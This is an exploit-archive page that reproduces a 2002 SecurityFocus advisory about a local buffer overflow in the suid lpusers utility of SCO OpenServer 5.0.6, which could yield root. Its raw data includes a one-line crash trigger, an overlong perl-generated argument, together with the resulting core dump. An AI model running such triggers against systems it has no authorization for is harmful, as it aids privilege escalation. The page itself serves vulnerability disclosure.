header-logo
Suggest Exploit
vendor:
OpenServer 5.0.6
by:
SecurityFocus
7,2
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: OpenServer 5.0.6
Affected Version From: 5.0.6
Affected Version To: 5.0.6
Patch Exists: YES
Related CWE: N/A
CPE: o:sco:openserver_5.0.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2002

SCO OpenServer 5.0.6 lpusers Buffer Overflow Vulnerability

SCO OpenServer 5.0.6 (and possibly earlier versions) ships with several suid bin executables used in printer administration and related tasks. This includes lpusers, a component used to set the queue priority of jobs submitted to the LP print service by users. 'lpusers' contains a locally exploitable buffer overflow vulnerability that occurs when commandline arguments are of excessive length. If properly exploited, this can yield root privilege to the attacker.

Mitigation:

Ensure that all system and software components are kept up to date with the latest security patches and updates.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/2557/info

SCO OpenServer 5.0.6 (and possibly earlier versions) ships with several suid bin executables used in printer administration and related tasks.

This includes lpusers, a component used to set the queue priority of jobs submitted to the LP print service by users.
'lpusers' contains a locally exploitable buffer overflow vulnerability that occurs when commandline arguments are of excessive length.

If properly exploited, this can yield root privilege to the attacker.

/opt/K/SCO/Unix/5.0.6Ga/usr/lib/lpusers -u `perl -e 'print "A" x 700'`

Memory fault - core dumped

Navigation

Suggest Exploit

Services By CQR